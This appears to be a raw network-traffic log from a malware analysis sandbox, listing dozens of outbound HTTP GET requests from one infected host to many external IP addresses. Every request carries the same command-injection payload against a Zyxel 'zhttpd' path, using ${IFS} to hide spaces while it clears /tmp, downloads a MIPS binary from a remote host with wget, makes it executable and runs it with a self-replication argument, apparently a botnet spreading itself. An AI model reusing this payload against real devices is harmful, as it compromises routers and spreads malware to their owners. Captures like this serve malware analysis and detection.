                                            Feb 2, 2024 06:21:07.523480892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2981192.168.2.1534970222.122.11.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523519039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2982192.168.2.1547328217.64.86.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523555040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2983192.168.2.1538234192.29.193.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523578882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2984192.168.2.1549652101.67.144.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523614883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2985192.168.2.1537854146.230.196.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523646116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2986192.168.2.1535934212.0.180.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523696899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2987192.168.2.1542392135.164.54.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523730040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2988192.168.2.1539052199.186.118.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523778915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2989192.168.2.155327075.198.74.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523823977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2990192.168.2.154918873.87.52.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523844004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2991192.168.2.1544260182.145.236.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523889065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2992192.168.2.153546813.122.120.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523909092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2993192.168.2.1554202126.78.74.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.523958921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2994192.168.2.1532780161.74.30.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524084091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2995192.168.2.153488653.22.71.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524123907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2996192.168.2.1560806179.254.150.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524153948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2997192.168.2.155864620.75.174.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524214029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2998192.168.2.1536196159.253.153.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524231911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2999192.168.2.154027682.96.224.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524267912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3000192.168.2.1558108148.153.179.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524307013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3001192.168.2.1539600132.228.14.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524336100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3002192.168.2.1534258207.217.215.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524369001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3003192.168.2.153362036.128.219.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524414062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3004192.168.2.1544652171.166.180.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524463892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3005192.168.2.155752299.124.184.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524493933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3006192.168.2.1547518128.215.97.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524524927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3007192.168.2.1560152205.156.127.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524575949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3008192.168.2.1549320174.79.136.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524588108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3009192.168.2.1549184111.63.35.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524609089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3010192.168.2.1545650125.250.57.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524657011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3011192.168.2.154107657.35.59.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524708986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3012192.168.2.1534136205.156.86.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524755955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3013192.168.2.1559996142.226.65.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524790049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3014192.168.2.1550402178.100.7.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524832964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3015192.168.2.1551340189.123.63.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524866104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3016192.168.2.1559744148.40.189.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524897099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3017192.168.2.1555016108.212.210.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524929047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3018192.168.2.1557434154.214.91.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.524960995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3019192.168.2.1557314144.35.187.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525026083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3020192.168.2.155186693.44.117.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525049925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3021192.168.2.1545514216.90.139.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525094986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3022192.168.2.1532790115.159.12.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525142908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3023192.168.2.154711658.4.145.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525168896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3024192.168.2.155948858.124.124.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525218010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3025192.168.2.15375025.156.214.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525252104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3026192.168.2.1532994129.160.157.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525298119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3027192.168.2.1560498180.158.191.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525337934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3028192.168.2.155710813.181.198.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525382996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3029192.168.2.156079012.122.252.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525422096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3030192.168.2.1537040213.187.212.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525439024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3031192.168.2.15392744.221.184.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525484085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3032192.168.2.1551592163.145.196.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525547028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3033192.168.2.154968089.66.252.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525578976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3034192.168.2.1557272111.179.102.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525615931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3035192.168.2.154866649.59.123.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525640011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3036192.168.2.154143414.224.125.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525690079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3037192.168.2.1556444187.195.107.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525724888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3038192.168.2.153525675.1.41.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525765896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3039192.168.2.153929682.19.18.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525798082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3040192.168.2.154281484.176.71.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525842905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3041192.168.2.154689295.91.101.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525882959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3042192.168.2.154022253.123.171.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525913000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3043192.168.2.1557480100.130.42.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.525954008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3044192.168.2.1536220136.73.22.21443
                                            TimestampBytes transferredDirectionData
